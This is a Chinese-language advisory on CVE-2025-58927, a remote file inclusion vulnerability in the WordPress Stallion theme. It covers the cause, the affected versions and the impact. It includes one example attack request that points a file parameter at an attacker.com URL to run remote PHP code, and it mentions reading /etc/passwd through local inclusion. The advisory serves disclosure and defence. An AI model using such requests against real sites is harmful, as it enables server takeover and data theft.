CVE-2025-58927CVE-2025-58927是WordPress Stallion主题中的一个高危安全漏洞,CVSS评分达到8.1分。该漏洞属于PHP远程文件包含(Remote File Inclusion,简称RFI)类型,存在于Stallion主题的PHP代码中,由于对文件包含操作缺乏适当的输入验证,攻击者可以通过构造恶意请求来包含远程服务器上的任意文件,从而执行任意PHP代码。Stallion主题是一款由axiomthemes开发的WordPress付费主题,在全球范围内有广泛使用。该漏洞影响Stallion主题从最初版本到1.17的所有版本。由于该漏洞利用无需认证且攻击复杂度较低,攻击者可以在不需要任何用户交互的情况下发起攻击,成功利用后可获得服务器的完全控制权,对网站的机密性、完整性和可用性造成严重影响。Patchstack安全团队于2025年12月18日披露了此漏洞,建议所有使用该主题的用户立即采取防护措施。
该漏洞的根本原因在于Stallion主题的PHP代码中使用了不安全的文件包含函数(如include、require、include_once或require_once),并且对用户可控的输入参数缺乏充分的过滤和验证。攻击者可以通过HTTP请求中的参数(如GET或POST参数)注入恶意构造的文件路径或URL,诱导服务器包含并执行远程恶意PHP文件。在PHP配置允许的情况下(allow_url_fopen和allow_url_include启用),攻击者可以直接指定远程服务器的PHP文件URL,实现远程代码执行。即使服务器配置限制了远程文件包含,攻击者仍可能通过本地文件包含(LFI)漏洞读取敏感文件,如/etc/passwd、配置文件或日志文件,进而进行进一步的攻击利用。典型的攻击场景是:攻击者构造类似?file=http://attacker.com/malicious.txt的请求,服务器会尝试包含并执行远程服务器上的恶意代码。由于该漏洞的网络可达性和低攻击复杂度,攻击者可以自动化扫描和利用过程,大规模入侵使用该主题的WordPress网站。